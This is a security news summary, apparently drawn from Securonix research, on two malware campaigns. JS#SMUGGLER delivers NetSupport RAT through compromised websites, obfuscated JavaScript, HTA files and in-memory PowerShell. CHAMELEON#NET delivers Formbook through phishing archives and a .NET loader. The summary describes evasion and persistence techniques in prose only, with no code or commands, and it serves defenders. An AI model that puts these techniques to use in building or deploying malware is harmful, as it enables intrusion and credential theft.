Malicious JavaScript and PowerShell Used to Compromise Enterprise Systems

A new malware campaign named JS#SMUGGLER is being used to compromise enterprise users through infected websites that silently deploy the NetSupport Remote Access Trojan (RAT).

According to Securonix researchers, this campaign uses multi-layered execution methods involving obfuscated JavaScript, device-aware redirects, HTML Applications (HTA), and in-memory PowerShell scripts to bypass traditional antivirus and monitoring systems.

The result is full attacker control over the target system with minimal forensic evidence left behind.

In a separate operation named CHAMELEON#NET, attackers use phishing emails and malicious archives to install the Formbook malware, a known keylogger and information stealer. This infection chain relies on heavily obfuscated scripts, a .NET-based loader, and fileless deployment methods.

These two campaigns illustrate how modern malware authors continue to adapt and build on known delivery methods while introducing new layers of evasion to bypass existing defenses.

Why It Matters: Attackers are continuing to exploit known tools to create difficult-to-detect malware chains. Their use of legitimate infrastructure, such as compromised websites and common Windows utilities, increases the likelihood of successful infections and decreases the chance of early detection by traditional security tools.

• Device-Aware JavaScript Loaders Deliver Targeted Malware Payloads: JS#SMUGGLER uses compromised websites to run a JavaScript loader that profiles the visiting system and determines the next stage of attack based on whether the device is a desktop or mobile. On mobile devices, the victim may be redirected to a fake full-screen page, while desktop users receive a remote script designed to advance the infection chain. The loader includes logic to activate the attack only once per device, reducing visibility and limiting the chance that the malicious code is noticed by automated scanners or security teams reviewing logs.

• HTA Files and PowerShell Scripts Enable Fileless Malware Execution: After the JavaScript loader triggers the next step, an HTA payload is retrieved and run using mshta.exe, a legitimate Windows utility. This HTA file acts as a secondary loader, which in turn writes a PowerShell stager to disk, decrypts it, and executes it directly in memory. By avoiding persistent files and minimizing on-disk activity, the malware can evade endpoint detection tools and make evidence recovery more difficult. The HTA file also minimizes user-facing activity by disabling visible elements and running in a hidden state.

• NetSupport RAT Provides Complete Control to Attackers Once Deployed: The final payload in the JS#SMUGGLER campaign is NetSupport RAT, a remote access tool that grants the attacker the ability to interact with the system in real time. Capabilities include remote desktop access, uploading and downloading files, capturing keystrokes, executing commands, and using the infected machine as a proxy. Because NetSupport RAT is a legitimate remote management tool, it may not be flagged as malicious by some security products unless deployed in suspicious ways, which adds to its appeal for cybercriminals.

• CHAMELEON#NET Uses Malspam and .NET Loaders to Deliver Formbook: The CHAMELEON#NET campaign begins with phishing emails targeting users in government and social services. Victims are tricked into downloading an archive file that contains an obscure JavaScript dropper. This dropper writes multiple files to the system, including a .NET loader and a Java archive, which each contain embedded payloads. The .NET component decrypts and loads the Formbook malware entirely in memory using reflection, avoiding the creation of a detectable executable. Once active, Formbook logs keystrokes, steals credentials, and can exfiltrate sensitive files.

• Tactics Reduce Detection Rates: Both malware campaigns use layered confusion and advanced scripting to delay analysis and reduce detection. Persistence is maintained through registry edits or startup folder placement, allowing the malware to remain active across system reboots. These tactics demonstrate ongoing efforts by threat actors to make forensic analysis harder and reduce the effectiveness of traditional security software.

Go Deeper -> Experts Confirm JS#SMUGGLER Uses Compromised Sites to Deploy NetSupport RAT – The Hacker News